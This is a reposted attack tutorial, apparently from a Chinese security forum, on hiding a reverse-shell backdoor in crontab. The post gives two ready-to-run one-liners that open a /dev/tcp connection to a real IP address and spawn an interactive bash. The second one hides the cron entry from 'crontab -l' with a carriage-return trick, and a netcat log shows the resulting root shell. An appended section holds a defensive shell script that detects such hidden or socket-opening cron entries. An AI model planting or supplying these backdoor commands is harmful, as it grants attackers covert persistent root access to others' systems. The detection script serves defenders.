Using crontab to implement a fileless, highly compatible reverse-shell backdoor

Ideally run it as an uncommon user; the job is written to /var/spool/cron/$username

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i')|crontab -

Upgraded, sneakier version

(crontab -l;printf "* * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

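Because the \r returns the cursor to the start of the line and the padded text that follows overwrites the job on the terminal, crontab -l simply displays no crontab for $username; the entry itself is still stored in the spool file: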
[root@vincenthostname bin]# crontab -l
no crontab for root
The reverse connection succeeds:
[vincent@iZ62luqzx5xZ src]$ ./netcat -l -p 2345
bash: no job control in this shell
[root@vincenthostname ~]# whoami
whoami
root
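
A defender's check for the hiding trick above, as an added example that is not part of the original post: it flags crontab entries containing control characters (such as the \r that makes crontab -l show a fake message) and entries that reference /dev/tcp or /dev/udp. The function names, the sample files and the address 192.0.2.10 are constructed for illustration.

```shell
#!/bin/sh
# Added example (defensive): audit crontab spool files for entries hidden
# from `crontab -l` with control characters, or that open /dev/tcp sockets.

# scan_crontab FILE
# Prints "<check> line <n>" per finding; returns 1 if anything was found.
# Check 1: any control character except TAB (\r, ESC, backspace) can make
#          the terminal show something other than what cron executes.
# Check 2: bash network pseudo-devices do not belong in ordinary cron jobs.
scan_crontab() {
  findings=$(
    tr -d '\t' < "$1" | LC_ALL=C grep -n '[[:cntrl:]]' |
      cut -d: -f1 | sed 's/^/control-char line /'
    LC_ALL=C grep -nE '/dev/(tcp|udp)/' "$1" |
      cut -d: -f1 | sed 's/^/dev-socket line /'
  )
  [ -z "$findings" ] && return 0
  printf '%s\n' "$findings"
  return 1
}

# make_samples: build constructed spool files in a temp dir, print its path.
make_samples() {
  d=$(mktemp -d)
  # Constructed clean crontab (the TAB must not be reported).
  printf '# nightly job\n0 3 * * *\t/usr/local/bin/backup.sh\n' > "$d/clean"
  # Constructed hidden entry: command, then \r and a padded fake message.
  printf '0 3 * * * /bin/true\n* * * * * exec 9<> /dev/tcp/192.0.2.10/2345\rno crontab for root%60s\n' '' > "$d/hidden"
  printf '%s\n' "$d"
}

# Demo on the constructed samples. On a real host, run as root over the
# spool files instead (/var/spool/cron/*, or /var/spool/cron/crontabs/*
# on Debian-style systems).
SAMPLES=$(make_samples)
for f in "$SAMPLES/clean" "$SAMPLES/hidden"; do
  echo "== $f"
  scan_crontab "$f" || true
  sed -n l "$f"   # unambiguous listing: a carriage return is shown as \r
done
```

Reading the spool file through sed -n l (or cat -v) rather than crontab -l is what exposes the entry, because the control characters are printed as escapes instead of being interpreted by the terminal.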

Reposted from: http://zone.wooyun.org/content/18244